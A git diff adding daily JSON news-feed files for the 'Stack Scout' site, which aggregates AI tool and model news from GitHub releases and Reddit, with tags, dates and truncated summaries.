([#14653](https://github.com/vercel/vercel/pull/14653", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.38.0 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.0", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-14T23:21:55.000Z", + "summary": "## What's Changed\n* fix(cli): refresh slash command list after /skills reload by @NTaylorMullen in https://github.com/google-gemini/gemini-cli/pull/24454\n* Update README.md for links. by @g-samroberts in https://github.com/google-gemini/gemini-cli/pull/22759\n* fix(core): ensure complete_task tool calls are recorded in chat history by @abhipatel12 in https://github.com/google-gemini/gemini-cli/pull/24437\n* feat(policy): explicitly allow web_fetch in plan mode with ask_user by @Adib234 in https://", + "category": "ai_tools" + }, + { + "title": "My first impressions of Minimax M2.7 (Q5_K_M) vs Qwen 3.5 27b (Q8_0)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1slm3si/my_first_impressions_of_minimax_m27_q5_k_m_vs/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-14T21:25:57.000Z", + "summary": "I'm not sure if the AesSedai's Q5\\_K\\_M version of Minimax M2.7 is too much lobotomized or if the model itself is kind of weak. \n \nI did a simple experiment with both models running with the recommended parameters. The task was simply to generate some [AGENTS.md](http://AGENTS.md) files for a Python/Fast API/LangGraph project of mine (Roo Code /init command), which has some degree of complexity. \n \nMinimax runs painfully slowly on my setup, so I was expecting it to demolish Qwen 3.5... 
but", + "category": "ai_models" + }, + { + "title": "Refusal in open-weights models looks like a sparse gate -> amplifier circuit, and generalizes across 12 models from 6 labs (2B-72B)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sllajh/refusal_in_openweights_models_looks_like_a_sparse/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-14T20:55:57.000Z", + "summary": "Paper: [https://arxiv.org/abs/2604.04385](https://arxiv.org/abs/2604.04385)\n\nI've been trying to understand where refusal actually lives. How it works mechanistically. Arditi et al showed refusal can be steered with a single direction. What I looked at here is the mechanistic question: what circuit creates and amplifies that direction?\n\nMain result: Across 12 models from 6 labs, I keep finding a sparse **gate-amplifier** pattern.\n\nA mid-layer 'gate' attention head reads a detection-layer represe", + "category": "ai_models" + }, + { + "title": "Tencent HY-World 2.0 appears to be dropping on April 15 — open-source multimodal 3D world generation from Tencent Hunyuan", + "url": "https://reddit.com/r/StableDiffusion/comments/1sll638/tencent_hyworld_20_appears_to_be_dropping_on/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-14T20:51:17.000Z", + "summary": "Tencent’s Hunyuan team is apparently releasing **HY-World 2.0 tomorrow**, according to a teaser post from Tengfei Wang (Tencent Hunyuan): “Launching tomorrow — Tencent #HYWorld 2.0, an engine-ready World Model\" [Source](https://x.com/DylanTFWang/status/2043952886166761519)\n\nThe launch page is already live, and this looks like a major upgrade over HY-World 1.5 / WorldPlay.\n\n## What HY-World 2.0 does\n\nHY-World 2.0 is a multimodal world model that can generate persistent, explorable 3D environments", + "category": "creative_tools" 
+ }, + { + "title": "Updated Minimax m2.7 still doesn't allow coding a product. But before the next riot starts, Ryan Lee has already confirmed that they are still working on the license, and sale of products built by m2.7 is permitted.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1slkjqp/updated_minimax_m27_still_doesnt_allow_coding_a/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-14T20:28:09.000Z", + "summary": "Reddit r/LocalLLaMA — 9 upvotes, 14 comments", + "category": "ai_models" + }, + { + "title": "2x Asus Ascent GX10 - MiniMax M2.7 AWQ - cloud providers are dead to me", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sli7xr/2x_asus_ascent_gx10_minimax_m27_awq_cloud/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-14T19:05:55.000Z", + "summary": "Hello,\n\nI've been on a quest to get something \"close enough\" of Opus 4.5 running locally, for agentic coding, as SWE with 15 years of experience.\n\nI tried with one spark (yeah I'm calling my Asus Ascent GX10 sparks - they're the same), with models like Qwen 3.5 122B-A10B, Qwen3-Coder-Next, M2.5-REAP, ... Nothing was scratching the itch, too much frustration. 
128GB is simply not enough (for me) right now.\n\nSo I bought a second one (first one I paid 2800€, second one 2500€, plus 60€ cable - total ", + "category": "ai_models" + }, + { + "title": "Parisians: we're running an open source AI art hackathon with LTX + NVIDIA this Saturday", + "url": "https://reddit.com/r/StableDiffusion/comments/1slgzja/parisians_were_running_an_open_source_ai_art/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-14T18:22:37.000Z", + "summary": "Hack and train on H100s for a day w/ people from the open source community + reserachers. Full details [here](https://ados.events/hackathon)", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-15.json b/data/news-feed-2026-04-15.json new file mode 100644 index 0000000..bcef349 --- /dev/null +++ b/data/news-feed-2026-04-15.json @@ -0,0 +1,255 @@ +{ + "generated": "2026-06-05T00:44:34.272Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-15", + "article_count": 15, + "archived_story_count": 418, + "articles": [ + { + "title": "Qwen Code v0.14.5 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.14.5", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-15T15:33:06.000Z", + "summary": "## What's Changed\n* feat(cli/sdk): expose /context usage data in non-interactive mode and SDK API by @wenshao in https://github.com/QwenLM/qwen-code/pull/2916\n* feat(cli): add startup performance profiler by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3232\n* feat(core): implement fork subagent for context sharing by @wenshao in https://github.com/QwenLM/qwen-code/pull/2936\n* feat(vscode-ide-companion): add /account for 
account display by @qqqys in https://github.com/QwenLM/qwen-code/p", + "category": "ai_tools" + }, + { + "title": "MCP vs API?", + "url": "https://reddit.com/r/ClaudeAI/comments/1slr3qj/mcp_vs_api/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-15T00:52:13.000Z", + "summary": "I am trying to get deeper into utilizing Claude Code (trying to become more technical) as I have recently switched to the terminal and wanted some feedback on better understanding MCP vs APIs. \n \nTo me it seems like APIs are direct instructions on how to navigate and pull or push data between a product and another entity. MCP on the other hand seems like it is allowing the AI to dynamically use tools and definitions based on your current context.\n\nI have heard a lot of people say that API is ", + "category": "ai_tools" + }, + { + "title": "Built a Visual Studio Code extension to use OpenCode as a GUI sidebar instead of the terminal", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sml59n/built_a_visual_studio_code_extension_to_use/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-15T22:28:23.000Z", + "summary": "Hey everyone,\n\nI built a VS Code extension that brings OpenCode directly into your sidebar as a native panel, that uses the UI elements exactly as they are from the OpenCode Desktop app. No terminal needed, no browser tab. 
It just lives in your activity bar and works easily.\n\nWhat it does:\n\n* Runs OpenCode sessions inside a VS Code webview sidebar\n* Automatically uses whatever workspace folder you have open\n* Can auto-start a local OpenCode server when you open the sidebar\n* Keeps your session a", + "category": "ai_models" + }, + { + "title": "Open Ai Agent Dashboard for Monitoring, Memory, Performance and Audit Trail", + "url": "https://reddit.com/r/ChatGPT/comments/1sm2bkg/open_ai_agent_dashboard_for_monitoring_memory/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-15T10:39:22.000Z", + "summary": "Been building AI agents for about a year now and the thing that always drove me crazy is you deploy an agent, it runs for hours, and you have absolutely no idea what it did. The logs say \"task complete\" 47 times but did it actually do 47 different things or did it just loop the same task over and over?\n\nI had an agent burn through about $340 in API credits over a weekend because it got stuck retrying the same request. The logs showed 200 OK on every call. Everything looked fine. It just kept doi", + "category": "ai_tools" + }, + { + "title": "[P] Added 8 Indian languages to Chatterbox TTS via LoRA — 1.4% of parameters, no phoneme engineering [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1sltun8/p_added_8_indian_languages_to_chatterbox_tts_via/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-15T02:55:46.000Z", + "summary": "TL;DR: \nFine-tuned Chatterbox-Multilingual (Resemble AI's open-source TTS) to support Telugu, Kannada, Bengali, Tamil, Malayalam, Marathi, Gujarati, and Hindi using LoRA adapters + tokenizer extension. Only 7.8M / 544M parameters trained. 
Model + audio samples available.\n\n\\---\n\nThe Problem\n\nChatterbox-Multilingual supports 23 languages with zero-shot voice cloning, but no Dravidian languages (Telugu, Kannada, Tamil, Malayalam) and limited Indo-Aryan coverage beyond Hindi. That's 500M+ speakers ", + "category": "ai_research" + }, + { + "title": "Claude Code on desktop, redesigned for parallel agentic work.", + "url": "https://reddit.com/r/ClaudeAI/comments/1slictc/claude_code_on_desktop_redesigned_for_parallel/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.99, + "date": "2026-04-14T19:10:50.000Z", + "summary": "New sidebar for parallel sessions. Drag-and-drop layout. Integrated terminal. Run multiple agents from one window. \n\nNew tools make it easier to complete work without leaving the app.\n\nIntegrated terminal, in-app file editing, HTML + PDF preview, and a rebuilt diff viewer. Drag any panel into the layout that fits how you work. Three view modes when you want more (or less) signal.\n\nPlus more updates and customizations to fit how you work including SSH for Mac, keyboard shortcuts, and CLI plugin p", + "category": "ai_tools" + }, + { + "title": "I built a CLI that scans your project and auto-installs matching skills for Claude Code", + "url": "https://reddit.com/r/ClaudeAI/comments/1sm4at4/i_built_a_cli_that_scans_your_project_and/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.96, + "date": "2026-04-15T12:13:27.000Z", + "summary": "Hey r/ClaudeAI — I built a small tool to fix something that bugged me: every time I start a new project, picking the right skills from [skills.sh](http://skills.sh) is manual and slow.\n\n\n\nskillgrab does this:\n\n\n\n1. 
Scans \\`package.json\\`, \\`requirements.txt\\`, \\`pubspec.yaml\\`, \\`go.mod\\`, \\`Dockerfile\\`, \\`vercel.json\\`, etc. to detect your stack\n\n2. Reads your README for non-code hints (\"landing page\", \"pricing\", \"SEO\") and asks if you want marketing/design/sales skills\n\n3. Queries [skills.sh]", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.38.1 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.1", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-04-15T17:56:33.000Z", + "summary": "## What's Changed\n* fix(patch): cherry-pick 050c303 to release/v0.38.0-pr-25317 to patch version v0.38.0 and create version 0.38.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25466\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.0...v0.38.1", + "category": "ai_tools" + }, + { + "title": "MidJourney V8.1 Alpha Has Just Been Released. How Much Improvement Does It Have?", + "url": "https://reddit.com/r/midjourney/comments/1smlk07/midjourney_v81_alpha_has_just_been_released_how/", + "source": "Reddit r/midjourney", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-15T22:45:01.000Z", + "summary": "A new r/midjourney version always creates excitement. 
Beautiful sample images start appearing everywhere, people begin testing it immediately, and the usual question follows:\n\n**Is it really better, or is it just new?**\n\nWith MidJourney V8.1 Alpha now available, I wanted to look beyond the hype and test it in a more practical way.\n\nInstead of judging it in isolation, I compared it against two other strong image models available today: **Nano Banana 2** and **Grok Imagine 1.0.**\n\nThe goal was sim", + "category": "creative_tools" + }, + { + "title": "Great news, everyone. If you were sick of the condescending 5.2 model, creators have announced 5.3, with a less preachy tone. I have tested it over the last few days and it has become more balanced.", + "url": "https://reddit.com/r/ChatGPT/comments/1smkzda/great_news_everyone_if_you_were_sick_of_the/", + "source": "Reddit r/ChatGPT", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-15T22:21:37.000Z", + "summary": "I noticed a change from the condescending, sometimes rude and persistent looping behaviour of ChatGPT 5.2, so I asked Google about it and got this confirmation back that in March they updated to 5.3. 
I think I'm starting to receive that model now because it's become less preachy and isn't looping into psychoanalysis of me every time I talk to it.\n\n\n\nChatGPT has likely felt \"nicer\" recently due to several updates in early 2026 designed to improve its conversational tone and reduce the rigid, robo", + "category": "ai_tools" + }, + { + "title": "Qwen3.5 35b is sure still one the best local model (pulling above its weight) - More Details", + "url": "https://reddit.com/r/LocalLLaMA/comments/1smgqgy/qwen35_35b_is_sure_still_one_the_best_local_model/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-15T19:46:08.000Z", + "summary": "Last time I posted on how this model has performed in creating the webapp based on provided research paper. I got so much love to see people has appreciated the post and of-course the potential of this MOE model.\n\nI am sharing details on how I used this model to create webapp just using prompt and step by step guiding it. Later I converted my guidance steps into skills using same qwen-code cli with this model, that helped to add more examples.\n\nHere is github repo where I have added the [researc", + "category": "ai_models" + }, + { + "title": "Is it possible for an open-source AI that you run at home to become as powerful as that of chatgpt and others at that level?", + "url": "https://reddit.com/r/ChatGPT/comments/1smepps/is_it_possible_for_an_opensource_ai_that_you_run/", + "source": "Reddit r/ChatGPT", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-15T18:34:26.000Z", + "summary": "What would need to be true for someone to be able to run something that powerful entirely from home? Do they just need the correct weights? Assume that they don't need to do training (maybe some tech enthusiast does the training and just hands off the built model to people). 
Would storage space be a constraint? How much storage would they need? And how much RAM would they need? This is all for 1 person using it, not like the person would be serving an AI service out of their garage or something", + "category": "ai_tools" + }, + { + "title": "Lyra 2.0 : Explorable Generative 3D Worlds", + "url": "https://reddit.com/r/StableDiffusion/comments/1smbyjf/lyra_20_explorable_generative_3d_worlds/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-15T16:59:26.000Z", + "summary": "Nvidia released **Lyra 2.0**, a framework for generating persistent, explorable 3D worlds at scale, from NVIDIA Research. \n \nGenerating large-scale, complex environments is difficult for AI models. Current models often “forget” what spaces look like and lose track of movement over time, causing objects to shift, blur, or appear inconsistent. This prevents them from creating the reliable 3D environments required for downstream simulations. Lyra 2.0 solves these issues by: \n \n Maintaining per-", + "category": "creative_tools" + }, + { + "title": "[P] Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sm82ze/p_built_gpt2_llama_3_and_deepseek_from_scratch_in/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-15T14:42:55.000Z", + "summary": "I wrote a book that implements modern LLM architectures from scratch. The part most relevant to this sub:\n\nChapter 3 takes GPT-2 and swaps exactly 4 things to get Llama 3.2-3B:\n\n1. LayerNorm → RMSNorm\n2. Learned positional encodings → RoPE\n3. GELU → SwiGLU\n4. 
Multi-Head Attention → Grouped-Query Attention\n\nThen loads Meta's real pretrained weights.\n\nChapter 5 builds DeepSeek's full architecture: MLA with the absorption trick, decoupled RoPE, MoE with shared experts and fine-grained segmentation,", + "category": "ai_models" + }, + { + "title": "Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book [p]", + "url": "https://reddit.com/r/MachineLearning/comments/1sm75yf/built_gpt2_llama_3_and_deepseek_from_scratch_in/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-15T14:08:23.000Z", + "summary": "I spent the past year implementing five LLM architectures from scratch in PyTorch and wrote a book documenting the process.\n\nWhat's covered:\n\n* Vanilla encoder-decoder transformer (English to Hindi translation)\n* GPT-2 (124M), loading real OpenAI pretrained weights\n* Llama 3.2-3B, showing the exact 4 component swaps from GPT-2 (RMSNorm, RoPE, SwiGLU, GQA), loading Meta's pretrained weights\n* KV cache mechanics, MQA, GQA\n* DeepSeek: Multi-Head Latent Attention with absorption trick and decoupled ", + "category": "ai_research" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-16.json b/data/news-feed-2026-04-16.json new file mode 100644 index 0000000..0a03285 --- /dev/null +++ b/data/news-feed-2026-04-16.json @@ -0,0 +1,259 @@ +{ + "generated": "2026-06-05T00:44:34.430Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-16", + "article_count": 15, + "archived_story_count": 396, + "articles": [ + { + "title": "Vercel CLI vercel@51.5.1 released", + "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.5.1", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "developer_tool", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "cli_tool", + "tool_update" + ], + "importance": 
0.9199999999999999, + "date": "2026-04-16T20:37:28.000Z", + "summary": "### Patch Changes\n\n- Improve Claude Code Vercel plugin install and update prompts across CLI commands. ([#15921](https://github.com/vercel/vercel/pull/15921))\n\n- Updated dependencies \\[[`5219572d21a2ba4b49cc1c27d244c1ff5d76c591`](https://github.com/vercel/vercel/commit/5219572d21a2ba4b49cc1c27d244c1ff5d76c591), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://github.com/vercel/vercel/commit/2babfa22946d80a92f1307a8d860a9039d695b09), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://gi", + "category": "ai_tools" + }, + { + "title": "I got tired of copying/pasting between ChatGPT and X, so I built an extension that brings the AI directly into the timeline", + "url": "https://reddit.com/r/ChatGPT/comments/1snf7bl/i_got_tired_of_copyingpasting_between_chatgpt_and/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-16T20:20:53.000Z", + "summary": "I use ChatGPT to help draft posts or brainstorm replies, but the workflow of copying tweets, pasting them into ChatGPT, asking it to reply, and then pasting it back into Twitter was driving me crazy. Also, it almost always sounds like a generic robot\n\nSo, I built **Tweetback**, a Chrome/Edge/Firefox extension that brings your API key directly into the X/Twitter interface.\n\nI wanted to see how far I could push the AI to actually understand context and sound human. 
Here is what it can do:\n\n**\"Clon", + "category": "ai_tools" + }, + { + "title": "anyone else notice labs are getting more secretive about their best models?", + "url": "https://reddit.com/r/ChatGPT/comments/1sn599k/anyone_else_notice_labs_are_getting_more/", + "source": "Reddit r/ChatGPT", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-16T14:31:54.000Z", + "summary": "something shifted recently and i can't stop thinking about it. the trend used to be: new model drops, blog post goes up, everyone gets access on day one. now it feels like the most capable stuff is quietly going behind walls with \"restricted access\" or gated research programs, while the public-facing releases are... fine, but clearly not the frontier.\n\ngoogle dropped gemma 4 open-weight and it's genuinely good — MoE architecture, strong reasoning, apache license. meta's doing multimodal reasonin", + "category": "ai_tools" + }, + { + "title": "Mozilla Announces \"Thunderbolt\" As An Open-Source, Enterprise AI Client", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sn4ibj/mozilla_announces_thunderbolt_as_an_opensource/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-16T14:04:23.000Z", + "summary": "Reddit r/LocalLLaMA — 4 upvotes, 3 comments", + "category": "ai_models" + }, + { + "title": "Qwen3.6-35B-A3B released!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sn3izh/qwen3635ba3b_released/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-16T13:27:39.000Z", + "summary": "Meet Qwen3.6-35B-A3B:Now Open-Source!🚀🚀\n\nA sparse MoE model, 35B total params, 3B active. 
Apache 2.0 license.\n\n\\- Agentic coding on par with models 10x its active size\n\n\\- Strong multimodal perception and reasoning ability\n\n\\- Multimodal thinking + non-thinking modes\n\nEfficient. Powerful. Versatile. \n\nBlog:https://qwen.ai/blog?id=qwen3.6-35b-a3b\n\nQwen Studio:chat.qwen.ai\n\nHuggingFace:https://huggingface.co/Qwen/Qwen3.6-35B-A3B\n\nModelScope:https://modelscope.cn/models/Qwen/Qwen3.6-35B-A3B", + "category": "ai_models" + }, + { + "title": "Built a visual memory layer for Claude — see what Claude remembers about your projects (open source, free, WIP)", + "url": "https://reddit.com/r/ClaudeAI/comments/1smzaxb/built_a_visual_memory_layer_for_claude_see_what/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-16T10:13:13.000Z", + "summary": " Claude already has memory — but it's a black box. \n You can't see what it knows, what decisions were made, \n or how your project is progressing.\n \n Dendrite makes Claude's memory visible.\n \n How it works:\n - Claude writes structured memory slices via MCP \n (decisions, observations, tasks, open questions)\n - You see everything in a searchable 3-pane reader\n - Set your own preferences that Claude pulls from \n on every session\n - Track project progress, o", + "category": "ai_tools" + }, + { + "title": "Built an political benchmark for LLMs. KIMI K2 can't answer about Taiwan (Obviously). GPT-5.3 refuses 100% of questions when given an opt-out. 
[P]", + "url": "https://reddit.com/r/MachineLearning/comments/1smqsbu/built_an_political_benchmark_for_llms_kimi_k2/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-16T02:31:24.000Z", + "summary": "I spent the few days building a benchmark that maps where frontier LLMs fall on a 2D political compass (economic left/right + social progressive/conservative) using 98 structured questions across 14 policy areas. I tested GPT-5.3, Claude Opus 4.6, and KIMI K2. The results are interesting.\n\n\n\n**The repo is fully open-source -- run it yourself on any model with an API:** \n[https://github.com/dannyyaou/llm-political-eval](https://github.com/dannyyaou/llm-political-eval)\n\n\n\n\n\n**The headline finding", + "category": "ai_research" + }, + { + "title": "Keycard – inject API keys into subprocesses, never touch shell env", + "url": "https://www.keycard.studio/", + "source": "Hacker News", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.97, + "date": "2026-04-16T01:37:49.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "I turned my MacBook notch into a live Claude Code dashboard", + "url": "https://reddit.com/r/ClaudeAI/comments/1smm0mo/i_turned_my_macbook_notch_into_a_live_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.91, + "date": "2026-04-15T23:04:00.000Z", + "summary": "Notch Pilot lives in the MacBook notch (no menu bar icon, no dock icon) and shows:\n\n* Live 5-hour session % + weekly limits — the exact numbers from your Claude account page, pulled from the same oauth/usage endpoint Claude Code uses.\n* Permission prompts rendered inline — shell commands get a code block, file edits get a red/green diff, URLs get 
parsed. Deny / Allow / Always allow, with \"always allow\" writing to \\~/.claude/settings.json.\n* Every live session at a glance — project, model, uptime", + "category": "ai_tools" + }, + { + "title": "OpenClaw v2026.4.15 released", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.4.15", + "source": "GitHub Releases · OpenClaw", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-04-16T21:50:22.000Z", + "summary": "\n### Changes\n\n- Anthropic/models: default Anthropic selections, `opus` aliases, Claude CLI defaults, and bundled image understanding to Claude Opus 4.7.\n- Google/TTS: add Gemini text-to-speech support to the bundled `google` plugin, including provider registration, voice selection, WAV reply output, PCM telephony output, and setup/docs guidance. (#67515) Thanks @barronlroth.\n\n### Fixes\n\n- Agents/skills: sort prompt-facing `available_skills` entries by skill name after merging sources so `skills.", + "category": "ai_tools" + }, + { + "title": "Crush v0.59.0 released", + "url": "https://github.com/charmbracelet/crush/releases/tag/v0.59.0", + "source": "GitHub Releases · Crush", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.84, + "date": "2026-04-16T21:21:52.000Z", + "summary": "## Changelog\n### New!\n* 3773b23cb44afc4567d892f01c41c8dc62556ca0: feat(shell): add jq as a bash builtin + a jq skill for it (@meowgorithm)\n* b37649e45299d426aeae73a54efc0d1155fb5c91: feat(ui): add skills discovery status to sidebar and landing page (#2384) (@huaiyuWangh)\n* e8f5e2025d2401ffe06123c42226f3b7a20abe3a: feat: show progress bar on rio terminal (#2624) (@andreynering)\n### Fixed\n* f546a071891c4ced02c832ff1789534df2874bda: fix(prompt): remind coder to follow `` format on comm", + "category": "ai_tools" + }, + { + "title": "Qwen3.6-35B is worse at tool use and reasoning loops 
than 3.5?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sni4c1/qwen3635b_is_worse_at_tool_use_and_reasoning/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-16T22:09:37.000Z", + "summary": "Been running the new model entire evening in different quants and coding tasks with OpenCode. Used oMLX and LM Studio. Used recommended settings for precise tasks (temp 0.6, top-k 20, etc) and OpenCode agent. So far my findings is that the model goes into infinite reasoning loops more often than 3.5, and I sometimes see failed tool calls. The latter could be parser bugs, but the former is the model itself.\n\nIt’s ok on basic apps, but really struggles to move ahead on something more complex like ", + "category": "ai_models" + }, + { + "title": "PSA: Qwen3.6 ships with preserve_thinking. Make sure you have it on.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sne4gh/psa_qwen36_ships_with_preserve_thinking_make_sure/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-16T19:41:55.000Z", + "summary": "I had previously posted [here about a fix to their 3.5 template ](https://www.reddit.com/r/LocalLLaMA/comments/1sg076h/i_tracked_a_major_cache_reuse_issue_down_to_qwen/)to help resolve the KV cache invalidation issue from their template. A lot of you found it useful.\n\nQwen 3.6 now addresses this with a new preserve\\_thinking flag. From their [model page:](https://huggingface.co/Qwen/Qwen3.6-35B-A3B)\n\n>`please use \"preserve_thinking\": True instead of \"chat_template_kwargs\": {\"preserve_thinking", + "category": "ai_models" + }, + { + "title": "Google, please just open source Imagen (2022), Gemini 1.0 Nano and Gemini 1.0 Pro. 
You have nothing to lose at this point.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sncslc/google_please_just_open_source_imagen_2022_gemini/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-16T18:54:41.000Z", + "summary": "Ok, so imagen (the original one from 2022, not imagen 3/4) should be open source. The gemini 1.0 nano model and the gemini 1.0 pro models should be open source. xAI already open-sourced grok 1, but Google???????? at this point you should open source this\n\nGoogle if you seeing this (prob. not) please open source it in I/O 2026\n\n \nEdit: please open source also palm 2 unicorn and bison, geminii 3.1 destroys it", + "category": "ai_models" + }, + { + "title": "Replaced an LLM's text generation head with one that emits raw machine opcodes. Here are my findings", + "url": "https://reddit.com/r/LocalLLaMA/comments/1snbyh8/replaced_an_llms_text_generation_head_with_one/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-16T18:25:26.000Z", + "summary": "Follow-up to [my previous post](https://www.reddit.com/r/LocalLLaMA/comments/1sm076z/i_cant_stop_thinking_about_this_why_are_we_making/) about why AI agents should not control machines through text.\n\nThe idea: every AI agent today generates human text, parses it, then executes it. That's like controlling a robot arm by dictating English. Tesla FSD replaced that pattern. Cameras go in, steering commands come out, no text in between. Can we do the same for software? 
